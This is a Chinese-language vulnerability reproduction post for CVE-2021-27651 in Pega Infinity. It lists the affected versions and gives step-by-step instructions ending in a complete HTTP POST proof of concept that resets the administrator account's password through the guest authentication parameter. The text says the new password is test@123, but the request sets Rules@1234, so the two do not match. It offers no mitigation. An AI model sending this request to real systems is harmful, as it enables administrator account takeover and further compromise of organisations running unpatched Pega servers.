(CVE-2021-27651)Pega Infinity任意重置密码漏洞复现
一、简介
PEGA infinity是美国PEGA公司的一个应用软件。提供从数字混乱过渡到真正的数字转换。
二、漏洞描述
该漏洞允许攻击者可以直接重置任意账号的密码,从而配合系统内部中的功能达到getshell的目的。
三、影响范围
Pega Infinity> = 8.2.1 Pega Infinity <= 8.5.2
四、复现
1、访问环境地址如下
2、点击“trouble logging in”,进入如下页面
3、用户名输入administrator@pega.com,拦截如下数据包
4、输入poc如下,即可成功修改administrator@pega.com密码为test@123 Poc如下:
| POST /prweb/PRServlet/app/default/:PEGA_ID/!STANDARD HTTP/1.1 (:PEGA_ID is a unique ID for each site, it is in this format: ZOgwf2Zk3OsEg_oG74MXXxG2bXKbv56W) Host: redacted.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 112
Origin: https://redacted.com DNT: 1
Connection: close
Referer: [https://redacted.com/prweb/PRServlet/app/default/:PEGA_ID/!STANDARD](https://redacted.com/prweb/PRServlet/app/default/:PEGA_ID*/!STANDARD) Cookie: yourCookie
Upgrade-Insecure-Requests: 1
pzAuth=guest&NewPassword=Rules%401234&ConfPassword=Rules%401234&pyActivity%3DCode-Security.pzChangeUserPassword= | | — |
文章参考:
https://www.freebuf.com/vuls/273316.html https://github.com/EdgeSecurityTeam/Vulnerability/blob/main/PEGA%20pega%20infinity%20%E6%8E%88%E6%9D%83%E8%AE%A4%E8%AF%81%E7%BB%95%E8%BF%87RCE%EF%BC%88CVE-2021-27651%EF%BC%89.md
请登录后查看回复内容